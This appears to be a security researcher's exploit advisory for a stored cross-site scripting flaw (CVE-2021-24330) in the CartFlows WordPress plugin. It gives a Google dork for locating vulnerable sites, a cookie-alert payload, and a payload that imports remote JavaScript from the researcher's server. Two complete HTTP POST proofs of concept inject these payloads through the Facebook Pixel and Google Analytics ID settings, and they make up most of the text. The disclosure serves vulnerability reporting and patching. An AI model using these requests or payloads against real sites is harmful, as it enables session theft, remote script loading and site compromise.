/*! - # VULNERABILITY: Funnel Builder by CartFlows WordPress Plugin <= 1.6.12 - Authenticated Persistent XSS - # GOOGLE DORK: inurl:/wp-content/plugins/cartflows/ - # DATE: 2021-04-26 - # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ] - # VENDOR: CartFlows Inc [ https://cartflows.com ] - # SOFTWARE VERSION: <= 1.6.12 - # SOFTWARE LINK: https://wordpress.org/plugins/cartflows/ - # CVSS: AV:N/AC:L/PR:H/UI:N/S:C - # CWE: CWE-79 - # CVE: CVE-2021-24330 */ ### -- [ Info: ] [i] An Authenticated Persistent XSS vulnerability was discovered in the Funnel Builder by CartFlows plugin through v1.6.12 for WordPress. [i] Vulnerable parameter(s): $facebook_settings['facebook_pixel_id'] (cartflows/classes/class-cartflows-tracking.php:64), $google_analytics_settings['google_analytics_id'] (cartflows/classes/class-cartflows-tracking.php:214). ### -- [ Impact: ] [~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource. ### -- [ Payloads: ] [$] 'm0ze'); alert(document.cookie); //('m0ze' [$] ';import("https://m0ze.ru/payload/a2r.js");' ### -- [ PoC #1 | Authenticated Persistent XSS | Facebook Pixel ID: ] [!] POST /wp-admin/admin-ajax.php?_locale=user HTTP/2 Host: example.com Cookie: [admin cookies] User-Agent: Mozilla/5.0 Content-Type: multipart/form-data; boundary=---------------------------136768928210535225113059586199 Content-Length: 1787 -----------------------------136768928210535225113059586199 Content-Disposition: form-data; name="_cartflows_facebook[facebook_pixel_tracking]" disable -----------------------------136768928210535225113059586199 Content-Disposition: form-data; name="_cartflows_facebook[facebook_pixel_tracking]" enable -----------------------------136768928210535225113059586199 Content-Disposition: form-data; name="_cartflows_facebook[facebook_pixel_tracking_for_site]" disable -----------------------------136768928210535225113059586199 Content-Disposition: form-data; name="_cartflows_facebook[facebook_pixel_tracking_for_site]" enable -----------------------------136768928210535225113059586199 Content-Disposition: form-data; name="_cartflows_facebook[facebook_pixel_id]" 'm0ze'); alert(document.cookie); //('m0ze' -----------------------------136768928210535225113059586199 Content-Disposition: form-data; name="_cartflows_facebook[facebook_pixel_initiate_checkout]" disable -----------------------------136768928210535225113059586199 Content-Disposition: form-data; name="_cartflows_facebook[facebook_pixel_add_payment_info]" disable -----------------------------136768928210535225113059586199 Content-Disposition: form-data; name="_cartflows_facebook[facebook_pixel_purchase_complete]" disable -----------------------------136768928210535225113059586199 Content-Disposition: form-data; name="action" cartflows_save_global_settings -----------------------------136768928210535225113059586199 Content-Disposition: form-data; name="security" e918af4728 -----------------------------136768928210535225113059586199 Content-Disposition: form-data; name="setting_tab" facebook_pixel -----------------------------136768928210535225113059586199-- ### -- [ PoC #2 | Authenticated Persistent XSS | Google Analytics ID: ] [!] POST /wp-admin/admin-ajax.php?_locale=user HTTP/2 Host: example.com Cookie: [admin cookies] User-Agent: Mozilla/5.0 Content-Type: multipart/form-data; boundary=---------------------------372833242730857634751324923175 Content-Length: 1814 -----------------------------372833242730857634751324923175 Content-Disposition: form-data; name="_cartflows_google_analytics[enable_google_analytics]" disable -----------------------------372833242730857634751324923175 Content-Disposition: form-data; name="_cartflows_google_analytics[enable_google_analytics]" enable -----------------------------372833242730857634751324923175 Content-Disposition: form-data; name="_cartflows_google_analytics[enable_google_analytics_for_site]" disable -----------------------------372833242730857634751324923175 Content-Disposition: form-data; name="_cartflows_google_analytics[google_analytics_id]" ';import("https://m0ze.ru/payload/a2r.js");' -----------------------------372833242730857634751324923175 Content-Disposition: form-data; name="_cartflows_google_analytics[enable_begin_checkout]" disable -----------------------------372833242730857634751324923175 Content-Disposition: form-data; name="_cartflows_google_analytics[enable_add_to_cart]" disable -----------------------------372833242730857634751324923175 Content-Disposition: form-data; name="_cartflows_google_analytics[enable_add_payment_info]" disable -----------------------------372833242730857634751324923175 Content-Disposition: form-data; name="_cartflows_google_analytics[enable_purchase_event]" disable -----------------------------372833242730857634751324923175 Content-Disposition: form-data; name="action" cartflows_save_global_settings -----------------------------372833242730857634751324923175 Content-Disposition: form-data; name="security" e918af4728 -----------------------------372833242730857634751324923175 Content-Disposition: form-data; name="setting_tab" google_analytics -----------------------------372833242730857634751324923175-- ### -- [ Contacts: ] [+] Website: m0ze.ru [+] GitHub: @m0ze [+] Telegram: @m0ze_ru [+] Twitter: @vladm0ze